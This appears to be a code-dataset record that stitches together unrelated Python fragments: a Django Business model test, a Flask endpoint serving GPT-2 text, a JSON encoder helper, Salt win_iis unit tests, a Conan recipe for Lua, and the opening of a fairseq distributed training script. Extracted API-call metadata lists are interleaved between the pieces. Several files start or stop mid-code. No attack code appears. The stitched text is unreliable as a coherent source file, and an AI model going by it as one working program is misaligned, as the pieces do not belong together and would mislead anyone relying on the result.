# moving them into setUp()/setUpTestData() would be safer.
user = User.objects.get(id=1)
profile = Profile.objects.get(id=1)
neighbourhood = Neighbourhood.objects.get(id=1)
class TestBusiness(TestCase):
    """Unit tests for the Business model's CRUD helper methods."""
    def setUp(self):
        # One saved Business per test, linked to the module-level fixtures.
        self.business=Business(name = "hardware", description="your stop for best prices", user= profile, neighbourhood_id=neighbourhood, business_email='<EMAIL>')
        self.business.save()
    def test_instance(self):
        # Sanity check: the fixture is a Business model instance.
        self.assertTrue(isinstance(self.business,Business))
    def test_create_business(self):
        self.business.create_business()
        businesses=Business.objects.all()
        self.assertTrue(len(businesses)>0)
    def test_delete_business(self):
        self.business.delete_business()
        businesses=Business.objects.all()
        self.assertTrue(len(businesses)==0)
    def test_update_business(self):
        self.business.create_business()
        # self.business.update_business(self.business.id, 'hardware')
        # NOTE(review): the update call above is commented out, so this test
        # only verifies that rows exist — no update behaviour is exercised.
        updated_business = Business.objects.all()
        self.assertTrue(len(updated_business) > 0)
    def tearDown(self):
        Business.objects.all().delete()
| [
"django.contrib.auth.models.User.objects.get"
] | [((133, 155), 'django.contrib.auth.models.User.objects.get', 'User.objects.get', ([], {'id': '(1)'}), '(id=1)\n', (149, 155), False, 'from django.contrib.auth.models import User\n')] |
# -*- coding: utf-8 -*-
import json
import os
import numpy as np
import tensorflow.compat.v1 as tf
from src import model, sample, encoder
from flask import Flask
from flask import request, jsonify
import time
######model
def interact_model(
    model_name='run1',
    seed=None,
    nsamples=1,
    batch_size=1,
    length=None,
    temperature=1,
    top_k=0,
    top_p=1,
    models_dir='checkpoint',
):
    """Load a GPT-2 checkpoint and yield the pieces needed for sampling.

    This is a generator: it builds the TF graph, restores the latest
    checkpoint for *model_name*, and yields a single tuple
    ``(sess, context, output, enc)`` so the caller can keep the session
    alive across repeated sampling calls (see ``output_something``).

    Args:
        model_name: sub-directory of *models_dir* holding hparams + checkpoint.
        seed: optional RNG seed for reproducible sampling.
        nsamples: total number of samples; must be a multiple of batch_size.
        batch_size: samples generated per ``sess.run``.
        length: tokens to generate; defaults to half the model context window.
        temperature, top_k, top_p: sampling hyper-parameters.
        models_dir: root directory containing model sub-directories.

    Raises:
        ValueError: if *length* exceeds the model's context window.
    """
    models_dir = os.path.expanduser(os.path.expandvars(models_dir))
    if batch_size is None:
        batch_size = 1
    assert nsamples % batch_size == 0

    enc = encoder.get_encoder(model_name, models_dir)
    hparams = model.default_hparams()
    with open(os.path.join(models_dir, model_name, 'hparams.json')) as f:
        hparams.override_from_dict(json.load(f))

    if length is None:
        # Default: generate at most half the context window.
        length = hparams.n_ctx // 2
    elif length > hparams.n_ctx:
        raise ValueError("Can't get samples longer than window size: %s" % hparams.n_ctx)

    with tf.Session(graph=tf.Graph()) as sess:
        context = tf.placeholder(tf.int32, [batch_size, None])
        np.random.seed(seed)
        tf.set_random_seed(seed)
        output = sample.sample_sequence(
            hparams=hparams, length=length,
            context=context,
            batch_size=batch_size,
            temperature=temperature, top_k=top_k, top_p=top_p
        )

        saver = tf.train.Saver()
        # BUG FIX: restore the checkpoint for *model_name* instead of the
        # hard-coded "run1" sub-directory (identical for the default value).
        ckpt = tf.train.latest_checkpoint(os.path.join(models_dir, model_name))
        saver.restore(sess, ckpt)
        # Yield (instead of return) so the `with` block — and thus the
        # session — stays open while the caller uses it.
        yield sess, context, output, enc
def output_something(bio, sess, context, output, enc):
    """Generate a text continuation for *bio* using a live GPT-2 session.

    Args:
        bio: prompt string to condition the model on.
        sess: open tf.Session with the restored model (from interact_model).
        context: the context placeholder tensor.
        output: the sampling op.
        enc: the BPE encoder/decoder.

    Returns:
        The decoded generated text (prompt tokens excluded).
    """
    context_tokens = enc.encode(bio)
    # Run one sampling step; slice off the prompt tokens from the front so
    # only the newly generated continuation remains.
    out = sess.run(output, feed_dict={
        context: [context_tokens for _ in range(1)]
    })[:, len(context_tokens):]
    text = enc.decode(out[0])  # decode the first (only) sample in the batch
    print(text)
    return text
########API
# Load the model once at server start-up; keeping a reference to the
# generator prevents interact_model's `with` block (and the TF session
# it holds open) from being torn down.
gen = interact_model()
sess, context, output, enc = next(gen)
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def welcome():
    """Generate text conditioned on the `bio` query parameter and return
    up to the first three lines as JSON."""
    start_time = time.time()
    bio = request.args.get('bio')  # None when the parameter is missing
    res = output_something(bio, sess, context, output, enc)
    # Keep only the first three generated lines.
    sentences = res.split("\n")[:3]
    print("----------------------------------------------------------- %s seconds ----------------------------------------------" % (time.time() - start_time))
    return jsonify(sentences=sentences)
if __name__ == '__main__':
    app.run(host='0.0.0.0', port=105)
"tensorflow.compat.v1.placeholder",
"flask.request.args.get",
"src.model.default_hparams",
"src.encoder.get_encoder",
"tensorflow.compat.v1.Graph",
"flask.Flask",
"os.path.expandvars",
"os.path.join",
"numpy.random.seed",
"tensorflow.compat.v1.set_random_seed",
"src.sample.sample_sequence",
"j... | [((2062, 2077), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (2067, 2077), False, 'from flask import Flask\n'), ((583, 626), 'src.encoder.get_encoder', 'encoder.get_encoder', (['model_name', 'models_dir'], {}), '(model_name, models_dir)\n', (602, 626), False, 'from src import model, sample, encoder\n'), ((641, 664), 'src.model.default_hparams', 'model.default_hparams', ([], {}), '()\n', (662, 664), False, 'from src import model, sample, encoder\n'), ((2152, 2163), 'time.time', 'time.time', ([], {}), '()\n', (2161, 2163), False, 'import time\n'), ((2175, 2198), 'flask.request.args.get', 'request.args.get', (['"""bio"""'], {}), "('bio')\n", (2191, 2198), False, 'from flask import request, jsonify\n'), ((2471, 2499), 'flask.jsonify', 'jsonify', ([], {'sentences': 'sentences'}), '(sentences=sentences)\n', (2478, 2499), False, 'from flask import request, jsonify\n'), ((452, 482), 'os.path.expandvars', 'os.path.expandvars', (['models_dir'], {}), '(models_dir)\n', (470, 482), False, 'import os\n'), ((1037, 1081), 'tensorflow.compat.v1.placeholder', 'tf.placeholder', (['tf.int32', '[batch_size, None]'], {}), '(tf.int32, [batch_size, None])\n', (1051, 1081), True, 'import tensorflow.compat.v1 as tf\n'), ((1090, 1110), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (1104, 1110), True, 'import numpy as np\n'), ((1119, 1143), 'tensorflow.compat.v1.set_random_seed', 'tf.set_random_seed', (['seed'], {}), '(seed)\n', (1137, 1143), True, 'import tensorflow.compat.v1 as tf\n'), ((1161, 1310), 'src.sample.sample_sequence', 'sample.sample_sequence', ([], {'hparams': 'hparams', 'length': 'length', 'context': 'context', 'batch_size': 'batch_size', 'temperature': 'temperature', 'top_k': 'top_k', 'top_p': 'top_p'}), '(hparams=hparams, length=length, context=context,\n batch_size=batch_size, temperature=temperature, top_k=top_k, top_p=top_p)\n', (1183, 1310), False, 'from src import model, sample, encoder\n'), ((1382, 1398), 
'tensorflow.compat.v1.train.Saver', 'tf.train.Saver', ([], {}), '()\n', (1396, 1398), True, 'import tensorflow.compat.v1 as tf\n'), ((679, 731), 'os.path.join', 'os.path.join', (['models_dir', 'model_name', '"""hparams.json"""'], {}), "(models_dir, model_name, 'hparams.json')\n", (691, 731), False, 'import os\n'), ((774, 786), 'json.load', 'json.load', (['f'], {}), '(f)\n', (783, 786), False, 'import json\n'), ((1441, 1473), 'os.path.join', 'os.path.join', (['models_dir', '"""run1"""'], {}), "(models_dir, 'run1')\n", (1453, 1473), False, 'import os\n'), ((998, 1008), 'tensorflow.compat.v1.Graph', 'tf.Graph', ([], {}), '()\n', (1006, 1008), True, 'import tensorflow.compat.v1 as tf\n'), ((2433, 2444), 'time.time', 'time.time', ([], {}), '()\n', (2442, 2444), False, 'import time\n')] |
"""
Helper functions related to json
Author: <NAME>
"""
import datetime
import decimal
import json
import uuid
import pathlib
class JSONEncoder(json.JSONEncoder):
    """
    A custom JSONEncoder that can handle a bit more data types than the one from stdlib.

    Extra types supported:
      * pathlib.PurePath (incl. Path)       -> string with forward slashes
      * uuid.UUID                            -> string
      * datetime.datetime / .time / .date    -> ISO-8601 string
      * datetime.timedelta                   -> total seconds (float)
      * complex, decimal.Decimal             -> string
    Any other unsupported object falls through to the stdlib encoder,
    which raises TypeError.
    """
    def default(self, o):
        """Return a JSON-serializable representation of *o*.

        Called by json.JSONEncoder only for objects the stdlib cannot
        serialize natively, so there is no need to probe the base class
        first — json.JSONEncoder.default() unconditionally raises
        TypeError.  (The previous try/except "passthrough" was dead code
        that silently swallowed that exception.)
        """
        # Handle Path objects; normalize separators so output is
        # platform-stable (PurePath also covers PurePosixPath/PureWindowsPath).
        if isinstance(o, pathlib.PurePath):
            return str(o).replace('\\', '/')
        # Handle UUID objects
        if isinstance(o, uuid.UUID):
            return str(o)
        if isinstance(o, (datetime.datetime, datetime.time, datetime.date)):
            return o.isoformat()
        if isinstance(o, datetime.timedelta):
            return o.total_seconds()
        if isinstance(o, (complex, decimal.Decimal)):
            return str(o)
        # Let the base class default method raise the TypeError
        return json.JSONEncoder.default(self, o)
| [
"json.JSONEncoder.default"
] | [((1019, 1052), 'json.JSONEncoder.default', 'json.JSONEncoder.default', (['self', 'o'], {}), '(self, o)\n', (1043, 1052), False, 'import json\n'), ((382, 415), 'json.JSONEncoder.default', 'json.JSONEncoder.default', (['self', 'o'], {}), '(self, o)\n', (406, 415), False, 'import json\n')] |
# -*- coding: utf-8 -*-
'''
:synopsis: Unit Tests for Windows IIS Module 'module.win_iis'
:platform: Windows
:maturity: develop
versionadded:: Carbon
'''
# Import Python Libs
from __future__ import absolute_import
import json
# Import Salt Libs
from salt.exceptions import SaltInvocationError
from salt.modules import win_iis
# Import Salt Testing Libs
from salttesting import TestCase, skipIf
from salttesting.helpers import ensure_in_syspath
from salttesting.mock import (
MagicMock,
patch,
NO_MOCK,
NO_MOCK_REASON,
)
# Make the test helpers importable when run straight from the source tree.
ensure_in_syspath('../../')
# Globals
# Seed the module with an empty __salt__ so patch.dict() has a dict to patch.
win_iis.__salt__ = {}
# Make sure this module runs on Windows system
HAS_IIS = win_iis.__virtual__()
@skipIf(not HAS_IIS, 'This test case runs only on Windows systems')
@skipIf(NO_MOCK, NO_MOCK_REASON)
class WinIisTestCase(TestCase):
    '''
    Test cases for salt.modules.win_iis
    '''
    # Every test patches win_iis._srvmgr (the PowerShell runner) so no real
    # IIS command is ever executed; the list_* helpers are stubbed to shape
    # the "existing state" each function under test sees.
    @patch('salt.modules.win_iis._srvmgr',
           MagicMock(return_value={'retcode': 0}))
    @patch('salt.modules.win_iis.list_apppools',
           MagicMock(return_value=dict()))
    def test_create_apppool(self):
        '''
        Test - Create an IIS application pool.
        '''
        with patch.dict(win_iis.__salt__):
            self.assertTrue(win_iis.create_apppool('MyTestPool'))
    # _srvmgr returns JSON on stdout, mimicking PowerShell's ConvertTo-Json.
    @patch('salt.modules.win_iis._srvmgr',
           MagicMock(return_value={
               'retcode': 0,
               'stdout': json.dumps([{'name': 'MyTestPool', 'state': 'Started',
                                      'Applications': {'value': ['MyTestSite'],
                                                       'Count': 1}}])}))
    def test_list_apppools(self):
        '''
        Test - List all configured IIS application pools.
        '''
        with patch.dict(win_iis.__salt__):
            self.assertIsInstance(win_iis.list_apppools(), dict)
    @patch('salt.modules.win_iis._srvmgr',
           MagicMock(return_value={'retcode': 0}))
    @patch('salt.modules.win_iis.list_apppools',
           MagicMock(return_value={'MyTestPool': {
               'applications': list(),
               'state': 'Started'}}))
    def test_remove_apppool(self):
        '''
        Test - Remove an IIS application pool.
        '''
        with patch.dict(win_iis.__salt__):
            self.assertTrue(win_iis.remove_apppool('MyTestPool'))
    @patch('salt.modules.win_iis._srvmgr',
           MagicMock(return_value={'retcode': 0}))
    def test_restart_apppool(self):
        '''
        Test - Restart an IIS application pool.
        '''
        with patch.dict(win_iis.__salt__):
            self.assertTrue(win_iis.restart_apppool('MyTestPool'))
    # Empty list_sites/list_apppools stubs mean "nothing exists yet", so the
    # create path is exercised rather than the already-exists early return.
    @patch('salt.modules.win_iis._srvmgr',
           MagicMock(return_value={'retcode': 0}))
    @patch('salt.modules.win_iis.list_sites',
           MagicMock(return_value=dict()))
    @patch('salt.modules.win_iis.list_apppools',
           MagicMock(return_value=dict()))
    def test_create_site(self):
        '''
        Test - Create a basic website in IIS.
        '''
        kwargs = {'name': 'MyTestSite', 'sourcepath': r'C:\inetpub\wwwroot',
                  'apppool': 'MyTestPool', 'hostheader': 'mytestsite.local',
                  'ipaddress': '*', 'port': 80, 'protocol': 'http'}
        with patch.dict(win_iis.__salt__):
            self.assertTrue(win_iis.create_site(**kwargs))
    @patch('salt.modules.win_iis._srvmgr',
           MagicMock(return_value={'retcode': 0}))
    @patch('salt.modules.win_iis.list_sites',
           MagicMock(return_value=dict()))
    @patch('salt.modules.win_iis.list_apppools',
           MagicMock(return_value=dict()))
    def test_create_site_failed(self):
        '''
        Test - Create a basic website in IIS using invalid data.
        '''
        # The bogus protocol must make create_site raise before _srvmgr runs.
        kwargs = {'name': 'MyTestSite', 'sourcepath': r'C:\inetpub\wwwroot',
                  'apppool': 'MyTestPool', 'hostheader': 'mytestsite.local',
                  'ipaddress': '*', 'port': 80, 'protocol': 'invalid-protocol-name'}
        with patch.dict(win_iis.__salt__):
            self.assertRaises(SaltInvocationError, win_iis.create_site, **kwargs)
    @patch('salt.modules.win_iis._srvmgr',
           MagicMock(return_value={'retcode': 0}))
    @patch('salt.modules.win_iis.list_sites',
           MagicMock(return_value={
               'MyTestSite': {'apppool': 'MyTestPool',
                              'bindings': {'*:80:': {'certificatehash': None,
                                                     'certificatestorename': None,
                                                     'hostheader': None,
                                                     'ipaddress': '*', 'port': 80,
                                                     'protocol': 'http',
                                                     'sslflags': 0}},
                              'id': 1, 'sourcepath': r'C:\inetpub\wwwroot',
                              'state': 'Started'}}))
    def test_remove_site(self):
        '''
        Test - Delete a website from IIS.
        '''
        with patch.dict(win_iis.__salt__):
            self.assertTrue(win_iis.remove_site('MyTestSite'))
    @patch('salt.modules.win_iis._srvmgr',
           MagicMock(return_value={
               'retcode': 0,
               'stdout': json.dumps([{'applicationPool': 'MyTestPool',
                                     'name': 'testApp', 'path': '/testApp',
                                     'PhysicalPath': r'C:\inetpub\apps\testApp',
                                     'preloadEnabled': False,
                                     'protocols': 'http'}])}))
    def test_list_apps(self):
        '''
        Test - Get all configured IIS applications for the specified site.
        '''
        with patch.dict(win_iis.__salt__):
            self.assertIsInstance(win_iis.list_apps('MyTestSite'), dict)
    @patch('salt.modules.win_iis.list_sites',
           MagicMock(return_value={
               'MyTestSite': {'apppool': 'MyTestPool',
                              'bindings': {'*:80:': {'certificatehash': None,
                                                     'certificatestorename': None,
                                                     'hostheader': None,
                                                     'ipaddress': '*', 'port': 80,
                                                     'protocol': 'http',
                                                     'sslflags': 0}},
                              'id': 1, 'sourcepath': r'C:\inetpub\wwwroot',
                              'state': 'Started'}}))
    def test_list_bindings(self):
        '''
        Test - Get all configured IIS bindings for the specified site.
        '''
        with patch.dict(win_iis.__salt__):
            self.assertIsInstance(win_iis.list_bindings('MyTestSite'), dict)
if __name__ == '__main__':
    # Allow running this test module stand-alone via Salt's integration runner.
    from integration import run_tests  # pylint: disable=import-error
    run_tests(WinIisTestCase, needs_daemon=False)
| [
"salttesting.mock.patch.dict",
"salt.modules.win_iis.remove_apppool",
"salt.modules.win_iis.create_site",
"salt.modules.win_iis.list_apps",
"integration.run_tests",
"salt.modules.win_iis.__virtual__",
"salt.modules.win_iis.create_apppool",
"salttesting.mock.MagicMock",
"salttesting.helpers.ensure_in... | [((556, 583), 'salttesting.helpers.ensure_in_syspath', 'ensure_in_syspath', (['"""../../"""'], {}), "('../../')\n", (573, 583), False, 'from salttesting.helpers import ensure_in_syspath\n'), ((675, 696), 'salt.modules.win_iis.__virtual__', 'win_iis.__virtual__', ([], {}), '()\n', (694, 696), False, 'from salt.modules import win_iis\n'), ((700, 766), 'salttesting.skipIf', 'skipIf', (['(not HAS_IIS)', '"""This test case runs only on Windows systems"""'], {}), "(not HAS_IIS, 'This test case runs only on Windows systems')\n", (706, 766), False, 'from salttesting import TestCase, skipIf\n'), ((768, 799), 'salttesting.skipIf', 'skipIf', (['NO_MOCK', 'NO_MOCK_REASON'], {}), '(NO_MOCK, NO_MOCK_REASON)\n', (774, 799), False, 'from salttesting import TestCase, skipIf\n'), ((7149, 7194), 'integration.run_tests', 'run_tests', (['WinIisTestCase'], {'needs_daemon': '(False)'}), '(WinIisTestCase, needs_daemon=False)\n', (7158, 7194), False, 'from integration import run_tests\n'), ((943, 981), 'salttesting.mock.MagicMock', 'MagicMock', ([], {'return_value': "{'retcode': 0}"}), "(return_value={'retcode': 0})\n", (952, 981), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((1935, 1973), 'salttesting.mock.MagicMock', 'MagicMock', ([], {'return_value': "{'retcode': 0}"}), "(return_value={'retcode': 0})\n", (1944, 1973), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((2462, 2500), 'salttesting.mock.MagicMock', 'MagicMock', ([], {'return_value': "{'retcode': 0}"}), "(return_value={'retcode': 0})\n", (2471, 2500), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((2775, 2813), 'salttesting.mock.MagicMock', 'MagicMock', ([], {'return_value': "{'retcode': 0}"}), "(return_value={'retcode': 0})\n", (2784, 2813), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((3477, 3515), 'salttesting.mock.MagicMock', 
'MagicMock', ([], {'return_value': "{'retcode': 0}"}), "(return_value={'retcode': 0})\n", (3486, 3515), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((4245, 4283), 'salttesting.mock.MagicMock', 'MagicMock', ([], {'return_value': "{'retcode': 0}"}), "(return_value={'retcode': 0})\n", (4254, 4283), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((4342, 4655), 'salttesting.mock.MagicMock', 'MagicMock', ([], {'return_value': "{'MyTestSite': {'apppool': 'MyTestPool', 'bindings': {'*:80:': {\n 'certificatehash': None, 'certificatestorename': None, 'hostheader':\n None, 'ipaddress': '*', 'port': 80, 'protocol': 'http', 'sslflags': 0}},\n 'id': 1, 'sourcepath': 'C:\\\\inetpub\\\\wwwroot', 'state': 'Started'}}"}), "(return_value={'MyTestSite': {'apppool': 'MyTestPool', 'bindings':\n {'*:80:': {'certificatehash': None, 'certificatestorename': None,\n 'hostheader': None, 'ipaddress': '*', 'port': 80, 'protocol': 'http',\n 'sslflags': 0}}, 'id': 1, 'sourcepath': 'C:\\\\inetpub\\\\wwwroot', 'state':\n 'Started'}})\n", (4351, 4655), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((6074, 6387), 'salttesting.mock.MagicMock', 'MagicMock', ([], {'return_value': "{'MyTestSite': {'apppool': 'MyTestPool', 'bindings': {'*:80:': {\n 'certificatehash': None, 'certificatestorename': None, 'hostheader':\n None, 'ipaddress': '*', 'port': 80, 'protocol': 'http', 'sslflags': 0}},\n 'id': 1, 'sourcepath': 'C:\\\\inetpub\\\\wwwroot', 'state': 'Started'}}"}), "(return_value={'MyTestSite': {'apppool': 'MyTestPool', 'bindings':\n {'*:80:': {'certificatehash': None, 'certificatestorename': None,\n 'hostheader': None, 'ipaddress': '*', 'port': 80, 'protocol': 'http',\n 'sslflags': 0}}, 'id': 1, 'sourcepath': 'C:\\\\inetpub\\\\wwwroot', 'state':\n 'Started'}})\n", (6083, 6387), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((1194, 1222), 
'salttesting.mock.patch.dict', 'patch.dict', (['win_iis.__salt__'], {}), '(win_iis.__salt__)\n', (1204, 1222), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((1785, 1813), 'salttesting.mock.patch.dict', 'patch.dict', (['win_iis.__salt__'], {}), '(win_iis.__salt__)\n', (1795, 1813), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((2311, 2339), 'salttesting.mock.patch.dict', 'patch.dict', (['win_iis.__salt__'], {}), '(win_iis.__salt__)\n', (2321, 2339), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((2623, 2651), 'salttesting.mock.patch.dict', 'patch.dict', (['win_iis.__salt__'], {}), '(win_iis.__salt__)\n', (2633, 2651), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((3333, 3361), 'salttesting.mock.patch.dict', 'patch.dict', (['win_iis.__salt__'], {}), '(win_iis.__salt__)\n', (3343, 3361), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((4078, 4106), 'salttesting.mock.patch.dict', 'patch.dict', (['win_iis.__salt__'], {}), '(win_iis.__salt__)\n', (4088, 4106), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((5176, 5204), 'salttesting.mock.patch.dict', 'patch.dict', (['win_iis.__salt__'], {}), '(win_iis.__salt__)\n', (5186, 5204), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((5913, 5941), 'salttesting.mock.patch.dict', 'patch.dict', (['win_iis.__salt__'], {}), '(win_iis.__salt__)\n', (5923, 5941), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((6939, 6967), 'salttesting.mock.patch.dict', 'patch.dict', (['win_iis.__salt__'], {}), '(win_iis.__salt__)\n', (6949, 6967), False, 'from salttesting.mock import MagicMock, patch, NO_MOCK, NO_MOCK_REASON\n'), ((1252, 1288), 'salt.modules.win_iis.create_apppool', 'win_iis.create_apppool', (['"""MyTestPool"""'], {}), 
"('MyTestPool')\n", (1274, 1288), False, 'from salt.modules import win_iis\n'), ((1849, 1872), 'salt.modules.win_iis.list_apppools', 'win_iis.list_apppools', ([], {}), '()\n', (1870, 1872), False, 'from salt.modules import win_iis\n'), ((2369, 2405), 'salt.modules.win_iis.remove_apppool', 'win_iis.remove_apppool', (['"""MyTestPool"""'], {}), "('MyTestPool')\n", (2391, 2405), False, 'from salt.modules import win_iis\n'), ((2681, 2718), 'salt.modules.win_iis.restart_apppool', 'win_iis.restart_apppool', (['"""MyTestPool"""'], {}), "('MyTestPool')\n", (2704, 2718), False, 'from salt.modules import win_iis\n'), ((3391, 3420), 'salt.modules.win_iis.create_site', 'win_iis.create_site', ([], {}), '(**kwargs)\n', (3410, 3420), False, 'from salt.modules import win_iis\n'), ((5234, 5267), 'salt.modules.win_iis.remove_site', 'win_iis.remove_site', (['"""MyTestSite"""'], {}), "('MyTestSite')\n", (5253, 5267), False, 'from salt.modules import win_iis\n'), ((5977, 6008), 'salt.modules.win_iis.list_apps', 'win_iis.list_apps', (['"""MyTestSite"""'], {}), "('MyTestSite')\n", (5994, 6008), False, 'from salt.modules import win_iis\n'), ((7003, 7038), 'salt.modules.win_iis.list_bindings', 'win_iis.list_bindings', (['"""MyTestSite"""'], {}), "('MyTestSite')\n", (7024, 7038), False, 'from salt.modules import win_iis\n'), ((1436, 1552), 'json.dumps', 'json.dumps', (["[{'name': 'MyTestPool', 'state': 'Started', 'Applications': {'value': [\n 'MyTestSite'], 'Count': 1}}]"], {}), "([{'name': 'MyTestPool', 'state': 'Started', 'Applications': {\n 'value': ['MyTestSite'], 'Count': 1}}])\n", (1446, 1552), False, 'import json\n'), ((5415, 5601), 'json.dumps', 'json.dumps', (["[{'applicationPool': 'MyTestPool', 'name': 'testApp', 'path': '/testApp',\n 'PhysicalPath': 'C:\\\\inetpub\\\\apps\\\\testApp', 'preloadEnabled': False,\n 'protocols': 'http'}]"], {}), "([{'applicationPool': 'MyTestPool', 'name': 'testApp', 'path':\n '/testApp', 'PhysicalPath': 'C:\\\\inetpub\\\\apps\\\\testApp',\n 
'preloadEnabled': False, 'protocols': 'http'}])\n", (5425, 5601), False, 'import json\n')] |
from conans import ConanFile, CMake, tools
import os
dir_path = os.path.dirname(os.path.realpath(__file__))
class LuaConan(ConanFile):
    """Conan recipe that downloads, builds (via CMake) and packages Lua 5.3.5."""
    name = "Lua"
    version = "5.3.5"
    description = "Lua is a powerful, fast, lightweight, embeddable scripting language."
    # topics can get used for searches, GitHub topics, Bintray tags etc. Add here keywords about the library
    topics = ("conan", "lua", "scripting", "embedded")
    url = "https://github.com/helmesjo/conan-lua"
    homepage = "https://www.lua.org"
    author = "helmesjo <<EMAIL>>"
    license = "MIT" # Indicates license type of the packaged library; please use SPDX Identifiers https://spdx.org/licenses/
    exports = ["LICENSE.md"] # Packages the license for the conanfile.py
    # Remove following lines if the target lib does not use cmake.
    exports_sources = ["CMakeLists.txt"]
    generators = "cmake"
    # Options may need to change depending on the packaged library.
    settings = "os", "arch", "compiler", "build_type"
    options = {"shared": [False], "fPIC": [True, False]}
    default_options = {"shared": False, "fPIC": True}
    # Custom attributes for Bincrafters recipe conventions
    _source_subfolder = "source_subfolder"
    _build_subfolder = "build_subfolder"
    requires = ()
    def config_options(self):
        """Drop the fPIC option on Windows, where it has no meaning."""
        if self.settings.os == 'Windows':
            del self.options.fPIC
    def source(self):
        """Download and unpack the Lua source tarball (sha256-verified)."""
        source_url = "https://www.lua.org"
        tools.get("{0}/ftp/lua-{1}.tar.gz".format(source_url, self.version), sha256="0c2eed3f960446e1a3e4b9a1ca2f3ff893b6ce41942cf54d5dd59ab4b3b058ac")
        extracted_dir = "lua-" + self.version
        # Rename to "source_subfolder" is a convention to simplify later steps
        os.rename(extracted_dir, self._source_subfolder)
        # For some reason uid & gid are wrong in some situations when renaming the unziped tar (happened in docker-in-docker configuration)
        # Set it explicitly to match the current user & group
        if os.name == "posix":
            if os.system("chown -R {0}:{1} {2}".format(os.getuid(), os.getgid(), self._source_subfolder)) != 0:
                self.output.error("Failed to change owner of source to current user & group id ({0}:{1})".format(os.getuid(), os.getgid()))
    def _configure_cmake(self):
        """Create and configure the CMake helper used by build() and package()."""
        cmake = CMake(self)
        cmake.definitions["SOURCE_SUBDIR"] = self._source_subfolder
        cmake.configure(build_folder=self._build_subfolder)
        return cmake
    def build(self):
        """Build Lua with the configured CMake helper."""
        cmake = self._configure_cmake()
        cmake.build()
    def package(self):
        """Copy the LICENSE file and run the CMake install step."""
        self.copy(pattern="LICENSE", dst="licenses", src=self._source_subfolder)
        cmake = self._configure_cmake()
        cmake.install()
    def package_info(self):
        """Expose the built libraries and the lua include directory to consumers."""
        self.cpp_info.libs = tools.collect_libs(self)
        self.cpp_info.includedirs.append("include/lua")
| [
"os.rename",
"conans.CMake",
"os.getuid",
"os.path.realpath",
"os.getgid",
"conans.tools.collect_libs"
] | [((81, 107), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (97, 107), False, 'import os\n'), ((1743, 1791), 'os.rename', 'os.rename', (['extracted_dir', 'self._source_subfolder'], {}), '(extracted_dir, self._source_subfolder)\n', (1752, 1791), False, 'import os\n'), ((2343, 2354), 'conans.CMake', 'CMake', (['self'], {}), '(self)\n', (2348, 2354), False, 'from conans import ConanFile, CMake, tools\n'), ((2815, 2839), 'conans.tools.collect_libs', 'tools.collect_libs', (['self'], {}), '(self)\n', (2833, 2839), False, 'from conans import ConanFile, CMake, tools\n'), ((2089, 2100), 'os.getuid', 'os.getuid', ([], {}), '()\n', (2098, 2100), False, 'import os\n'), ((2102, 2113), 'os.getgid', 'os.getgid', ([], {}), '()\n', (2111, 2113), False, 'import os\n'), ((2259, 2270), 'os.getuid', 'os.getuid', ([], {}), '()\n', (2268, 2270), False, 'import os\n'), ((2272, 2283), 'os.getgid', 'os.getgid', ([], {}), '()\n', (2281, 2283), False, 'import os\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import torch
import logging
import torch.distributed as dist
import torch.multiprocessing as mp
from torch.utils.data import Dataset, DataLoader, BatchSampler
from torch.utils.data.distributed import DistributedSampler
from fairseq.tasks.translation import TranslationTask
from fairseq.data.language_pair_dataset import collate
from modules.data_utils import FairseqDataset
from modules.trainer import Trainer
from modules.utils import init_arg_parser
# Configure root logging once for all processes, fairseq-style format;
# every spawned rank inherits this configuration.
logging.basicConfig(
    format='%(asctime)s | %(levelname)s | %(name)s | %(message)s',
    datefmt='%Y-%m-%d %H:%M:%S',
    level=logging.INFO,
    stream=sys.stdout,
)
logger = logging.getLogger('fairseq.train')
def cleanup():
    """Tear down the torch.distributed process group for this rank."""
    dist.destroy_process_group()
def setup(rank, world_size):
    """Initialise torch.distributed (NCCL backend) for this process.

    Uses a fixed localhost rendezvous address/port, so only one such
    training job can run on the machine at a time.
    """
    os.environ['MASTER_ADDR'] = 'localhost'
    os.environ['MASTER_PORT'] = '12355'
    # initialize the process group
    dist.init_process_group("nccl", rank=rank, world_size=world_size)
def load_dictionary(path, src_dict_name='source', tgt_dict_name='target'):
    """Load the source & target fairseq dictionaries from *path*.

    Args:
        path: directory containing the ``dict.<name>.txt`` files.
        src_dict_name: name part of the source dictionary filename.
        tgt_dict_name: name part of the target dictionary filename.

    Returns:
        (src_dict, tgt_dict) tuple of fairseq Dictionary objects.

    Raises:
        AssertionError: if the two dictionaries disagree on the special
            bos/pad/eos/unk symbol ids (downstream collation assumes
            this exact layout).
    """
    # path = self.args.data_name_or_path
    src_dict = TranslationTask.load_dictionary(os.path.join(path, 'dict.{}.txt'.format(src_dict_name)))
    tgt_dict = TranslationTask.load_dictionary(os.path.join(path, 'dict.{}.txt'.format(tgt_dict_name)))
    assert src_dict.bos() == tgt_dict.bos() == 0
